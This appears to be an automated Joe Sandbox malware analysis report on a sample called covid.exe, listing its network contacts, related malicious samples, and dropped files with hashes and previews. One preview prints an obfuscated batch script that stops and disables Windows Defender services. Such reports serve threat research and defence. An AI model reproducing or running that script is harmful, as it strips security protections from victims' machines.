                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://reach-id.orbit.tm-awx.com/analytics.js.gzcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://github.com/ded/script.jscovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        		high
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://quantcast.mgr.consensu.orgcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        172.67.220.147
                        		mmwrlridbhmibnr.mlUnited States
                        		13335CLOUDFLARENETUSfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:393947
                        Start date:20.04.2021
                        Start time:22:58:20
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 59s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:covid.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:37
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal68.evad.winEXE@15/17@1/2
                        EGA Information:
                        • Successful, ratio: 75%
                        HDC Information:
                        • Successful, ratio: 100% (good quality ratio 95.8%)
                        • Quality average: 83%
                        • Quality standard deviation: 25.9%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 171
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 204.79.197.200, 13.107.21.200, 20.50.102.62, 104.43.139.144, 23.54.113.53, 205.185.216.10, 205.185.216.42, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.254.96.93, 20.54.26.129, 52.251.11.100
                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        22:59:57API Interceptor1x Sleep call for process: covid.exe modified
                        23:00:13API Interceptor68x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        172.67.220.1478TkFgL94vo.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4230C74ABAEB3870FA9EAF5AC5F71FD3.html
                        List.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
                        QUOTE.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9E65D4E4E8AEF8BD307A35D3BCE3AEEE.html
                        7789-2020.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3B326A21F43E9F3D00AC05CA57C8BA56.html
                        payment receipt.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BAD1D062871DD0CB1CFE768455005D62.html
                        QUOTE.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-97E0AB11BF622A9A31CDEFFB82113E1B.html
                        cLQd2QVOWu.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DBBB4E10CBD7095142CF4698058E72A4.html
                        item list.docGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
                        Orders.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7AFD341D75B1C01FA414B8FBB3F4F2BC.html
                        w1YYpRG02e.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5B3D301DB51C9B00F70AF37938BE599F.html
                        ADJUNTOEXTRACTO590878174787097120989222355748.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9A964AADD659F0067F881ACA423BCEDD.html
                        Factura Serfinanza022880209777477966487010096.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1E6FC8A774533AA394D4580F6DB6838B.html
                        SERFINANZAEXTRACTO283816558547438357773985414.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9B31D021FF64B2D5D03885F5B17A0908.html
                        EXTRACTOSERFINANZA596054271198721911813685868.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09E94B6C5260416402DA47E86244BE30.html
                        Property Details.pdf.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F02CDE0F9BC55206FC1C6FD48DB295AB.html
                        Request for Price.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CA312B7AD325B7F976AFB06E92A5151A.html
                        Invoice & BACS Documen.exeGet hashmaliciousBrowse
                        • mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E09CECC00887731FA9705E28293E8864.html

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        mmwrlridbhmibnr.mlSecuriteInfo.com.Trojan.Siggen13.10233.30629.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        OFneOuyQDx.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        2U1aZi86Sw.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        8TkFgL94vo.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        List.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        QUOTE.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        7789-2020.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        NEW ORDER.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        URGENT_QUOTATION_PR # 270473. 20-04-2021.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        QUOTE.docGet hashmaliciousBrowse
                        • 104.21.86.143
                        payment receipt.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        QUOTE.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        VZL5ROpeId.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        cLQd2QVOWu.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        item list.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        Orders.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        FneJElVdDf.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        w1YYpRG02e.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        eh1CjskZCs.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        QSN0y9JNF1.exeGet hashmaliciousBrowse
                        • 104.21.86.143

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        CLOUDFLARENETUSAttachementHtm.htmlGet hashmaliciousBrowse
                        • 104.16.18.94
                        6xrXVxpiSm.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        zj4NVQ6TKa.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        VZshmdIfmC.exeGet hashmaliciousBrowse
                        • 172.67.188.154
                        7wiTGdPpvv.exeGet hashmaliciousBrowse
                        • 172.67.188.154
                        7Wv8cQT117.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        5PthEm83NG.exeGet hashmaliciousBrowse
                        • 172.67.161.4
                        SecuriteInfo.com.Trojan.Siggen13.10233.30629.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        VoicePlayback (0155) for umclune myumanitoba .htmlGet hashmaliciousBrowse
                        • 104.16.18.94
                        apr.20.confirmaci#U0e02n SWIFT.exeGet hashmaliciousBrowse
                        • 162.159.134.233
                        Notification_test.htmGet hashmaliciousBrowse
                        • 104.16.19.94
                        OFneOuyQDx.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        SecuriteInfo.com.Variant.Bulz.440290.18036.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exeGet hashmaliciousBrowse
                        • 172.67.133.191
                        SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exeGet hashmaliciousBrowse
                        • 104.21.14.15
                        4QwdcKOvum.exeGet hashmaliciousBrowse
                        • 104.21.48.10
                        2U1aZi86Sw.exeGet hashmaliciousBrowse
                        • 104.21.86.143
                        8TkFgL94vo.exeGet hashmaliciousBrowse
                        • 172.67.220.147
                        List.docGet hashmaliciousBrowse
                        • 172.67.220.147
                        Account Details.exeGet hashmaliciousBrowse
                        • 104.21.19.200

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe4EQNFqt5Nm.exeGet hashmaliciousBrowse
                          URGENT_QUOTATION_PR # 270473. 20-04-2021.exeGet hashmaliciousBrowse
                            NEW SUPPLIER FORM.exeGet hashmaliciousBrowse
                              payment slip in foldrs.exeGet hashmaliciousBrowse
                                Discharge - 10,500MT of ZN CONCS - Bukpyung.exeGet hashmaliciousBrowse
                                  2021190411466.exeGet hashmaliciousBrowse
                                    GxRBjQa5k0.exeGet hashmaliciousBrowse
                                      f1MdIMyl48.exeGet hashmaliciousBrowse
                                        exALRGzKKl.exeGet hashmaliciousBrowse
                                          BGUSVBJPtY.exeGet hashmaliciousBrowse
                                            Invoice & BACS Document.exeGet hashmaliciousBrowse
                                              XwpoNqWEJ2.exeGet hashmaliciousBrowse
                                                Request for Price.exeGet hashmaliciousBrowse
                                                  EARTH SUMMT#U2013MAR21-V01VC.exeGet hashmaliciousBrowse
                                                    EARTH SUMMTMAR21-V01VC.exeGet hashmaliciousBrowse
                                                      NEWURGENTORDER.exeGet hashmaliciousBrowse
                                                        Invoice & BACS Documen.exeGet hashmaliciousBrowse
                                                          MV. WINTER SUMMER.exeGet hashmaliciousBrowse
                                                            MV. MCL - 21.exeGet hashmaliciousBrowse
                                                              Require your Sales Ledger from 01-April-2020.exeGet hashmaliciousBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):58596
                                                                Entropy (8bit):7.995478615012125
                                                                Encrypted:true
                                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.089415833598504
                                                                Encrypted:false
                                                                SSDEEP:6:kKLlkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:WwTJrkPlE99SNxAhUe0ht
                                                                MD5:3DCFE99F8D6BBF8BAE4F47092C0C15A0
                                                                SHA1:1C1CBE4F2F25DA8ADC960617F127CA4221786A24
                                                                SHA-256:A8413472CF220270F3D50ECD3753AFA5096896C6457668C055E120944DE188B4
                                                                SHA-512:FF2A4B7DA2F7D98EB1FF5C5C5C1D7264C072DC6C352A62A425CCC116626B0886B5D817A87A92A0053D9F400FA2A4FC37188A933FAEB3092ABC7B2B2C39526B39
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: p...... ........bA]ts6..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\covid.exe.log
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):1220
                                                                Entropy (8bit):5.354495486938689
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4Ks2f84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4K+sXE4G1qE4j:MxHKXfviYHKhQnoPtHoxHhAHKzvGHK1d
                                                                MD5:3B495BE0A7E2A57ACC717A4A3DBBD1E8
                                                                SHA1:D91F0A7B70C6C55AADEBD64CBBA5831481D3D5ED
                                                                SHA-256:D499F90E7622879DCA8ADEC7068D9D8926F33FD6FE9CDA465A7189CA4F4E9A83
                                                                SHA-512:A3B7D7326AB1D827E03799CC3E1D79155D757D14C0ABA1E98B612C011629D589B7A85AF8292587F38A81E123AB2BA359D3D20CB0A70B77022B4FE0C2BE96C9AB
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):14734
                                                                Entropy (8bit):4.993014478972177
                                                                Encrypted:false
                                                                SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                MD5:8D5E194411E038C060288366D6766D3D
                                                                SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                Malicious:false
                                                                Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):22184
                                                                Entropy (8bit):5.603143783785762
                                                                Encrypted:false
                                                                SSDEEP:384:jtCDK0CcfWXs0JYYSBKnmultIo3D7Y9g9SJUeRa1BMrm7iSRV7yUoI64I+iGq:Dfp4Kmultp339Xehab9+
                                                                MD5:1EEC9310290AB90DC59FA655592CB564
                                                                SHA1:4EE4B16DEFC3D73F4B1712A8A64BEF9D83076A93
                                                                SHA-256:7529B20EB35160F759D52075E8D304EDB39AA55AF9CBB2CF8EECDDA5D93529CC
                                                                SHA-512:696AB9ABAD204E75F06C1EA3AC79A7BA0627DABF4070F2BB38C5DEDD35786142F8B83A5DB6654957AE632AE44CAF7552ECA090316EC5D3C8565BED153522BE41
                                                                Malicious:false
                                                                Preview: @...e...........c.........../. .........A............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: 4EQNFqt5Nm.exe, Detection: malicious, Browse
                                                                • Filename: URGENT_QUOTATION_PR # 270473. 20-04-2021.exe, Detection: malicious, Browse
                                                                • Filename: NEW SUPPLIER FORM.exe, Detection: malicious, Browse
                                                                • Filename: payment slip in foldrs.exe, Detection: malicious, Browse
                                                                • Filename: Discharge - 10,500MT of ZN CONCS - Bukpyung.exe, Detection: malicious, Browse
                                                                • Filename: 2021190411466.exe, Detection: malicious, Browse
                                                                • Filename: GxRBjQa5k0.exe, Detection: malicious, Browse
                                                                • Filename: f1MdIMyl48.exe, Detection: malicious, Browse
                                                                • Filename: exALRGzKKl.exe, Detection: malicious, Browse
                                                                • Filename: BGUSVBJPtY.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Document.exe, Detection: malicious, Browse
                                                                • Filename: XwpoNqWEJ2.exe, Detection: malicious, Browse
                                                                • Filename: Request for Price.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMT#U2013MAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMTMAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: NEWURGENTORDER.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Documen.exe, Detection: malicious, Browse
                                                                • Filename: MV. WINTER SUMMER.exe, Detection: malicious, Browse
                                                                • Filename: MV. MCL - 21.exe, Detection: malicious, Browse
                                                                • Filename: Require your Sales Ledger from 01-April-2020.exe, Detection: malicious, Browse
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8399
                                                                Entropy (8bit):4.665734428420432
                                                                Encrypted:false
                                                                SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                Malicious:false
                                                                Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
